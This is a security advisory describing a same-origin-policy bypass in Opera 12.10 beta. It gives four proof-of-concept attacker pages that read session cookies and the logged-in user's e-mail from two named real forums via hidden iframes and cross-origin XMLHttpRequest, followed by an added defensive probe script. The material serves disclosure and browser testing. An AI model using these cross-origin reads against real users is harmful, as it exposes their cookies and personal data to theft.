Opera 12.10b Cross Site Scripting 0day PoC (CSRF) *youtube

2012-10-13 / 2012-10-29
Credit: M_script
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

The four PoC pages below are meant to be opened in Opera 12.10 beta. The first two frame a cross-origin resource (a stylesheet on forum.antichat.ru, a script on rdot.org) in a hidden iframe and read the framed document's cookie; the last two send a synchronous cross-origin XMLHttpRequest that carries the victim's cookies for the target forum and pull the logged-in account's e-mail address out of the returned vBulletin "edit password" page. A browser that enforces the same-origin policy refuses both reads, so what the PoCs demonstrate is a cross-origin read (same-origin policy bypass) rather than script injection into the target sites; the CWE-79 classification above is the one assigned in the original listing. Each snippet is a complete attacker-hosted page; the `tinyurl.com` reload check is kept as published.

PoC 1: cookie of forum.antichat.ru read through a hidden iframe

<script>
// Reload when the page is being displayed under tinyurl.com (kept as published)
if(document.domain == 'tinyurl.com') location.reload();
function xss() {
  // Read the cookie of the framed cross-origin document; Opera 12.10b returns it
  alert(document.frames[0].document.cookie);
}
function ifrAdd() {
  var ifr = document.createElement('iframe');
  ifr.style = 'width:0px;height:0px;visibility:hidden';
  // Use http:// when a referrer is present, https:// otherwise
  ifr.src = 'http';
  ifr.src += document.referrer.length ? '' : 's';
  ifr.src += '://forum.antichat.ru/css/a.css';
  ifr.onload = function(){xss()};
  document.body.appendChild(ifr);
}
</script>
<body onload=ifrAdd()>
==========================================================

PoC 2: same technique against rdot.org, framing a script file

<script>
if(document.domain == 'tinyurl.com') location.reload();
function xss() {
  // Read the cookie of the framed cross-origin document
  alert(document.frames[0].document.cookie);
}
function ifrAdd() {
  var ifr = document.createElement('iframe');
  ifr.style = 'width:0px;height:0px;visibility:hidden';
  ifr.src = 'https://rdot.org/forum/clientscript/vbulletin_read_marker.js';
  ifr.onload = function(){xss()};
  document.body.appendChild(ifr);
}
</script>
<body onload=ifrAdd()>
==========================================================

PoC 3: account e-mail of the logged-in forum.antichat.ru user read via cross-origin XMLHttpRequest

<script>
if(document.domain == 'tinyurl.com') location.reload();
function getMail() {
  var x = new XMLHttpRequest;
  // Synchronous cross-origin GET; the response body is readable in Opera 12.10b
  x.open('GET', 'http' + (document.referrer.length ? '' : 's') + '://forum.antichat.ru/profile.php?do=editpassword', false);
  x.send(null);
  // Extract the e-mail field from the vBulletin "edit password" form
  alert(x.responseText.match(/name="email" value="(.+?)"/)[1]);
}
</script>
<body onload=getMail()>
==========================================================

PoC 4: same technique against rdot.org

<script>
if(document.domain == 'tinyurl.com') location.reload();
function getMail() {
  var x = new XMLHttpRequest;
  x.open('GET', 'https://rdot.org/forum/profile.php?do=editpassword', false);
  x.send(null);
  alert(x.responseText.match(/name="email" value="(.+?)"/)[1]);
}
</script>
<body onload=getMail()>
==========================================================
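The following is an added example, not code from the original advisory or from M_script: a small same-origin-policy probe that generalises the two cross-origin reads the PoCs rely on (framed document cookie, XMLHttpRequest response body) and reports, per read, whether the browser blocked it or let the data through. The target URL `https://example.org/` is a placeholder assumption to be replaced with the origin under test; the DOM-dependent probes only start when a `document` exists, so the classification helpers can also be loaded under Node.

```javascript
// Added example (not from the original advisory): probe whether a browser
// blocks the two cross-origin reads used in the Opera 12.10b PoCs.

// Classify one attempted cross-origin read. With the same-origin policy
// enforced, touching a cross-origin frame's document throws SecurityError
// and a synchronous cross-origin XHR without CORS throws NetworkError; a
// non-empty value coming back means the read leaked. An empty string is
// counted as "blocked" (no data was obtained), so a same-origin target
// with no cookies also reads as blocked.
function classifyRead(attempt) {
  try {
    const value = attempt();
    if (value === null || value === undefined || value === '') {
      return { status: 'blocked', value: null, error: null };
    }
    return { status: 'leaked', value: String(value), error: null };
  } catch (err) {
    const name = (err && err.name) || String(err);
    const status = (name === 'SecurityError' || name === 'NetworkError') ? 'blocked' : 'error';
    return { status: status, value: null, error: name };
  }
}

// Pull a form field value out of leaked HTML, as the PoC does for the
// e-mail address, but return null instead of throwing when it is absent.
function extractField(html, fieldName) {
  const re = new RegExp('name="' + fieldName + '" value="([^"]*)"');
  const m = re.exec(html);
  return m ? m[1] : null;
}

// Probe 1 (browser only): frame the target in a hidden iframe and try to
// read the framed document's cookie once it has loaded.
function probeFrame(targetUrl, report) {
  const ifr = document.createElement('iframe');
  ifr.style.cssText = 'width:0;height:0;visibility:hidden';
  ifr.src = targetUrl;
  ifr.onload = function () {
    report('iframe document.cookie', classifyRead(function () {
      return ifr.contentWindow.document.cookie;
    }));
  };
  document.body.appendChild(ifr);
}

// Probe 2 (browser only): synchronous credentialed XHR to the target and a
// read of responseText.
function probeXhr(targetUrl, report) {
  report('XHR responseText', classifyRead(function () {
    const x = new XMLHttpRequest();
    x.open('GET', targetUrl, false);
    x.withCredentials = true;
    x.send(null);
    return x.responseText;
  }));
}

// Run both probes against one origin and collect the verdicts. Results are
// pushed onto the returned array as they arrive (the iframe probe is
// asynchronous, so its entry appears after the iframe's load event).
function runProbes(targetUrl) {
  const results = [];
  const report = function (label, verdict) {
    results.push({ probe: label, status: verdict.status, error: verdict.error });
    console.log(label + ': ' + verdict.status + (verdict.error ? ' (' + verdict.error + ')' : ''));
  };
  probeXhr(targetUrl, report);
  probeFrame(targetUrl, report);
  return results;
}

// Only start the browser probes when a DOM exists, so the helpers above can
// also be loaded and unit-tested under Node.
if (typeof document !== 'undefined' && typeof window !== 'undefined') {
  // Placeholder target (assumption): replace with the origin under test.
  window.addEventListener('load', function () { runProbes('https://example.org/'); });
}
```

Serve the script from an origin different from the target and open it in the browser under test; a correct browser logs `blocked (SecurityError)` for the iframe read and `blocked (NetworkError)` for the XHR read, while a browser affected the way the advisory describes logs `leaked` for one or both.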

References:

http://www.youtube.com/watch?v=txExYHPOGR0
http://cxsecurity.com/issue/WLB-2012100086
http://cxsecurity.com/issue/WLB-2012100252
https://rdot.org/forum/showthread.php?t=2444


Copyright 2022, cxsecurity.com